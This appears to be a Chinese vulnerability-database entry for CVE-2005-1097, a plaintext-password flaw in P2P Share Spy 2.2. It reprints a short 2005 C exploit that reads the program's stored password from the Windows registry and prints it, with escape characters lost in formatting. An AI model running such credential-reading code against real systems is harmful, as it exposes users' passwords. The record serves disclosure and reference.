Rebrand P2P Share Spy 漏洞

Rebrand P2P Share Spy 漏洞

漏洞ID 1108629 漏洞类型 未知
发布时间 2005-04-07 更新时间 2005-05-02
图片[1]-Rebrand P2P Share Spy 漏洞-安全小百科CVE编号 CVE-2005-1097
图片[2]-Rebrand P2P Share Spy 漏洞-安全小百科CNNVD-ID CNNVD-200505-131
漏洞平台 Windows CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/920
https://www.securityfocus.com/bid/90123
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-131
|漏洞详情
RebrandP2PShareSpy2.2在注册表的txtPassword值中以纯文本形式存储用户密码,从而允许本地用户获取权限。
|漏洞EXP
/*****************************************************************

P2P Share Spy 2.2 Local Exploit by Kozan

Application: P2P Share Spy 2.2
Vendor: Rebrand Software - www.rebrandsoftware.com
Vulnerable Description: P2P Share Spy 2.2 discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: [email protected]

*****************************************************************/

#include <stdio.h>
#include <windows.h>

#define BUFSIZE 100
HKEY hKey;
char Password[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

int main(void)
{

       if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\VB and VBA Program Settings\P2P Share Spy\Settings",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey) == ERROR_SUCCESS)
       {

           lRet = RegQueryValueEx( hKey, "txtPassword", NULL, NULL,(LPBYTE) Password, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("Not found!");
                                return 0;
                       }

                               RegCloseKey( hKey );

                       printf("P2P Share Spy 2.2 Local Exploit by Kozann");
                       printf("Credits to ATmaCAn");
                       printf("www.netmagister.com  -  www.spyinstructors.comn");
                       printf("[email protected]");
                       printf("Program Opening Password : %sn",Password);

        }
        else{
                printf("P2P Share Spy 2.2 is not installed on your system!n");
        }

       return 0;
}

// milw0rm.com [2005-04-07]
|受影响的产品
Rebrand P2p Share Spy 2.2
|参考资料

来源:SECTRACK
名称:1013673
链接:http://securitytracker.com/id?1013673

相关推荐: McKesson Pathways Homecare Weak Username and Password Encryption Vulnerability

McKesson Pathways Homecare Weak Username and Password Encryption Vulnerability 漏洞ID 1102673 漏洞类型 Design Error 发布时间 2001-12-07 更新时间…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享